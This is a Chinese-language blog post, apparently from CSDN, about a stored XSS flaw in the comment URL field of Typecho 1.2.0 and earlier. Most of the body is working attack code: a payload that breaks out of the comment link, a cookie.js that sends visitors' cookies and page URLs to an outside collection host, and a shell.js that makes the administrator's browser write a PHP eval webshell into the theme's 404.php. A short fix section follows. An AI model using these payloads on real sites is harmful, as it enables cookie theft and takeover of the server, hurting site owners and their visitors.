Typecho框架漏洞

已于 2023-11-20 18:53:18 修改
阅读量379 收藏
点赞数
文章标签: web安全 安全
于 2023-11-19 14:35:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62693307/article/details/134490371
版权

这里说的框架漏洞只适用于1.2.0版本及以下的版本

这里说的漏洞是xss漏洞,学过渗透的应该都学过,我在这里就不过多阐述了,下面我们直接进入正题

直接在这个地方插入网址,后面再接上html代码即可,代码如下:

http://xxx.xxx.com/"></a><script>alert("cookie")</script><a/href="#

然后再次访问时即可弹出一个框,这里学过xss漏洞的应该知道是什么意思了

接下来我要讲的是如何用这个xss漏洞反弹shell,这个方法我也是琢磨了很久才知道的,因为要用到js代码文件,代码文件如下:

cookie.js

// 定义一个全局变量 website,值为一个具体的网址
var website = "http://xss.xxxx.com";
 
// 声明并立即执行一个匿名函数
(function() {
  // 创建 Image 对象,并给它的 src 属性赋值为 website 和一些参数
  (new Image()).src = website
    + "/?keepsession=1"
    + "&location=" + escape((function() {
      try {
        // 尝试获取当前文档的 URL
        return document.location.href;
      } catch (e) {
        // 如果出错,返回一个空字符串
        return '';
      }
    })())
    + "&toplocation=" + escape((function() {
      try {
        // 尝试获取顶层窗口的 URL
        return top.location.href;
      } catch (e) {
        // 如果出错,返回一个空字符串
        return '';
      }
    })())
    + "&cookie=" + escape((function() {
      try {
        // 获取当前文档的 cookie
        return document.cookie;
      } catch (e) {
        // 如果出错,返回一个空字符串
        return '';
      }
    })())
    + "&opener=" + escape((function() {
      try {
        // 获取打开当前窗口的窗口的 URL
        return (window.opener && window.opener.location.href) ? window.opener.location.href : '';
      } catch (e) {
        // 如果出错,返回一个空字符串
        return '';
      }
    })());
})();

shell.js

function step1(){
    // 创建一个包含要注入的 iframe 的 HTML 字符串
    var data2="<iframe id=\"testxss\" src=\"/admin/theme-editor.php?theme=default&file=404.php\" width=\"0%\" height=\"0%\" onload=\"poc()\"></iframe>";
    // 保存原网页内容
    var oldata=document.body.innerHTML;
    // 将注入的 iframe 添加到文档中
    document.body.innerHTML=(oldata+data2);
}
 
// times 和 g_shell 变量用来跟踪 poc 函数执行的次数和是否已经成功注入 webshell
var times=0;
var g_shell=0;
 
function poc(){
    // 如果执行次数 >= 10,或者已经成功注入 webshell,就不再执行
    if(times<=10){
 
        // 获取要修改的 DOM 节点和触发“保存修改”操作的按钮
        var htmldata=document.getElementById('testxss').contentWindow.document.getElementById('content');
        var btn=document.getElementById('testxss').contentWindow.document.getElementsByTagName('button');
        
        // 保存要修改的原始数据,将要注入的 webshell 代码添加到末尾
        olddatas=htmldata.innerText;
        htmldata.innerText=('<?php @eval($_REQUEST["shell"]);?>\n')+olddatas;
 
        // 点击保存按钮,提交修改后的数据
        btn[1].click();
        
        // 增加 poc 函数的执行次数
        times+=1;
        
        // 如果已经成功注入 webshell,通过 AJAX 请求访问 webshell 接口
        if(g_shell==1){
            var xhr1=new XMLHttpRequest();
            xhr1.open('get','/usr/themes/Kratos/404.php?shell=1');
            xhr1.send();
        }
        else{
            return 0;
        }
    }
}
 
// 在页面加载完成后执行 step1 函数
step1();

然后这里就像上面反弹xss代码一样书写网址

http://xxx.xxx.com/cookie.js"></script><script/src=http://xxx.xxx.com/shell.js><a/href="#

然后等管理员访问评论是会使得js文件也给运行起来

生成的一句话目录路径可以自己改,上面的如下

在404.php中,这样路径的问题就解决了

这样我们就可以用蚁剑或其他工具连接后台了

修复方案

将Typecho更新至1.2.3以上的版本即可,因为官方已经修复了

手动修复

// var/Widget/Base/Comments.php 第 271 行代码
echo '<a href="' . $this->url . '"'
// 修改为以下代码
echo '<a href="' . Common::safeUrl($this->url) . '"'

// var/Widget/Feedback.php 第 209 行代码
$comment['url'] = $this->request->filter('trim')->url;
// 修改为以下代码
$comment['url'] = $this->request->filter('trim', 'url')->url;

// var/Widget/Feedback.php 第 308 行代码
$trackback['url'] = $this->request->filter('trim')->url;
// 修改为以下代码
$trackback['url'] = $this->request->filter('trim', 'url')->url;

// var/Widget/Options.php 第 85 行代码
* @property bool $commentsRequireURL
// 修改为以下代码
* @property bool $commentsRequireUrl

// /var/Typecho/Validate.php 第 99 行代码
return filter_var($str, FILTER_VALIDATE_EMAIL) !== false;
// 修改为以下代码
return (bool) preg_match("/^[_a-z0-9-\.]+@([-a-z0-9]+\.)+[a-z]{2,}$/i", $str);

孤寂204
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
typechov漏洞.zip
08-10
typecho框架漏洞-php反序列化任意代码执行,附加poc-exp,适合理解序列化漏洞
typecho博客框架
07-26
Typecho基于PHP5开发,支持多种数据库,是一款内核强健﹑扩展方便﹑体验友好﹑运行流畅的轻量级开源博客程序
漏洞分析之Typecho二连爆
hl1293348082的专栏
04-04 1946
这段时间 Typecho 在十几天之内连续爆了两个最高可 getshell 的洞,先是 SSRF 可打内网,再是反序列化直接前台 getshell ……安全性这方面堪忧…… 跟着师傅们的文章,简单地分析一下这两次漏洞,第二个反序列化的洞的溯源思路值得学习一波~ 虽然很多大号都分析过这个漏洞,写的也很详细,我作为一个初学者自己分析学习一下也是很有必要的,官方人员已经对这些漏洞进行的及时的修补并且推出了最新的版本,如果有用到这个博客的同学赶紧升级。 Typecho 1.0 (14.10.10) —— SS
PHP序列化-Typecho框架漏洞-任意代码执行
告白的博客
08-10 513
0x00 漏洞框架介绍 typecho框架存在反序列化漏洞,利用此漏洞可执行任意代码 0x01 漏洞复现 环境搭建 创建数据库–create database typecho; 漏洞Typecho框架漏洞-任意代码执行----- POC: YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob
typecho存储型xss漏洞复现
m0_73299839的博客
07-26 336
之前搭博客的时候使用的是typecho,然后有看到文章说typecho
Typecho 深入理解PHP反序列化漏洞
Fly_鹏程万里
09-17 1009
前言 Typecho是一个轻量版的博客系统,前段时间爆出getshell漏洞,网上也已经有相关的漏洞分析发布。这个漏洞是由PHP反序列化漏洞造成的,所以这里我们分析一下这个漏洞,并借此漏洞深入理解PHP反序列化漏洞。 一、 PHP反序列化漏洞 1.1 漏洞简介 PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。...
Typecho重大漏洞
qq_43676541的博客
04-15 327
#简介 Typecho是一个基于PHP的博客软件。Typecho是在GNU通用公共许可证2.0下发布的。 Typecho在1.1版本中存在反序列化漏洞,当系统未安装的情况下,攻击者可以利用ins
TypechoCMS反序列化漏洞(CVE-2018-18753)
m0_57379855的博客
03-12 1336
TypechoCMS反序列化漏洞(CVE-2018-18753Typecho反序列化漏洞php-pocpython-poc Typecho反序列化漏洞 PHP版本:5.4.5nts(PHPStudy) 在数据库新建一个数据库typecho 只要传一个不存在的成员变量,就会触发_get()魔法函数 使用_get()调用applyFilter() call_user_func() 可以执行任意命令,包括写入文件 php-poc python-poc 重点函数 ...
typecho_1.0_14.10.10_unserialize
weixin_43886198的博客
12-21 755
typecho_1.0_14.10.10_unserialize 漏洞描述 typecho 是博客CMS,前台install.php 文件存在反序列化漏洞,通过构造的反序列化字符串注入可以执行任意PHP 代码。 漏洞危害等级 高危 影响版本 typecho1.0(14.10.10) 漏洞复现 基础环境 组件 版本 OS Win10 Webserver MAMP PRO _PHP5.6.37 typecho 1.0(14.10.10) 网站安装 需要进入数据库创建一个typ
Typecho install.php存在的反序列化漏洞
王三三
11-30 1650
0x00 前言很久没有在安全方面折腾,突然收到“爸爸云”的短信,“您的服务器xxx.xxx.xxx.xxx存在网站后门,为防止黑客进一步入侵,请登录进行查看和处理”。当时正在出差,手头没电脑,草草看了一眼没来得及处理,最近得空研究了研究。常在河边走,哪有不湿鞋,网上已经有该漏洞的详解,仅以此文记录对反序列化漏洞研究的一个学习过程。0x01 漏洞复现使用工具:1、Firefox浏览器+HackBar插
Typecho sql
03-25
Typecho安装卡在第二步“确认你的配置”解决办法!!!
Typecho友链插件
05-20
Typecho的超棒友链插件,其样式也非常好看,大小也很小,绝对适合你的博客。 使用此插件请把内部文件解压到Typecho的插件文件夹。 源地址来自GitHub,考虑下载慢而打包到CSDN,有兴趣的请支持一下原作者
typecho主题模板,typecho后台模板
01-06
Typecho模板主题的,这是一款特别好看的单栏的适合阅读的主题,名字叫Major,版本更新到1.8VMajor是一款采用兼容性开发的 Typecho 主题,科创出品,原创主题,采用兼容性开发!
反序列化typecho2靶场漏洞-代码审计全过程(超详细)
qq_59020256的博客
01-28 1109
php· }
16-PHP代码审计——Typecho1.0.14反序列化漏洞
网络安全
05-26 1132
漏洞受影响版本: Typecho_v1.0.14以下 环境: php5以上 Typecho_v1.0.14.tar poc: __typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1O
Typecho反序列化漏洞分析
qq_41891666的博客
07-06 1474
0x01 环境准备 首先 git clone 到本地,然后phpstorm 打开, git reset hard 到漏洞修复之前的commit 0x02 审计 首先在install.php 开头就做出了两个判断,需要finish 参数以及refer头要是本站的值 核心漏洞处: 第一行直接反序列化Typecho_Cookie::get(’__typecho_config’),没有进行任何过滤 跟进Typecho_Cookie::get() 函数 发现此函数是用来取cookie 中的值的,但是如果对应
漏洞复现篇——Typecho反序列化漏洞
爱国小白帽
03-03 5155
实验环境: PHPstudy 火狐浏览器 Typecho 填好数据库密码和你的登录密码就可以了 安装时会报错,因为无法自动创建数据库,需要使用CREATE DATABASE typecho default charset utf8;语句手动创建数据库 ...
typecho反序列化漏洞(详细过程)
qq_61991235的博客
03-13 1777
typecho反序列化 菜鸡的第一条链子,酌情参考 搭建环境 利用phpstudy+phpstrom搭建环境调试(注意php版本大于5.4) 开始 漏洞起始点 前提:get方法传?finish=1,refer=http://127.0.0.1 若不设置的话exit,程序结束 详细看install.php前面部分的代码 <?php $config = unserialize(base64_decode(Typecho_Cookie::get('__typecho
Pentest Muse:一款专为网络安全人员设计的AI助手
最新发布
FreeBuf_的博客
06-19 1391
在代理模式下,Pentest Muse能够帮助我们完成一系列简单的任务,例如“帮我们在url为xxx的目标上执行SQL注入测试”。上注册后,我们就可以使用Pentest Muse来管理API了,创建一个账号,打开Pentest Muse的命令行接口,程序将会提示我们进行登录。在聊天模式中,我们可以直接与Pentest Muse聊天,并请它帮我们头脑风暴、编写Payload或对代码进行安全分析。简而言之,我们只需要把想做的事情告诉Pentest Muse,它就能够帮助我们完成想要的安全测试与评估任务。
typecho docker
08-30
Typecho Docker是使用Docker技术来部署和运行Typecho博客平台的一种方法。首先,我们需要拉取Typecho镜像,可以使用以下命令:docker pull 80x86/typecho。拉取镜像完毕后,我们可以创建一个Typecho容器来测试博客平台的运行,可以使用以下命令:docker run -d -p 90:80 --name="typecho" 80x86/typecho。接下来,可以按照《云原生之Docker实战》中的步骤进行环境配置和安装Typecho。首先,需要创建数据挂载目录,并确保镜像支持。然后,可以安装Typecho并进行初始环境配置。最后,可以通过设置界面外观、查看访问效果和查看插件列表等方式进行Typecho的基本使用。最后,可以测试博客效果以确认Typecho在Docker中的运行情况。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [利用Docker从零搭建Typecho博客并启用TLS](https://blog.csdn.net/zt06081108/article/details/115555924)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [【云原生之Docker实战】使用Docker部署Typecho个人博客平台](https://blog.csdn.net/jks212454/article/details/126107261)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值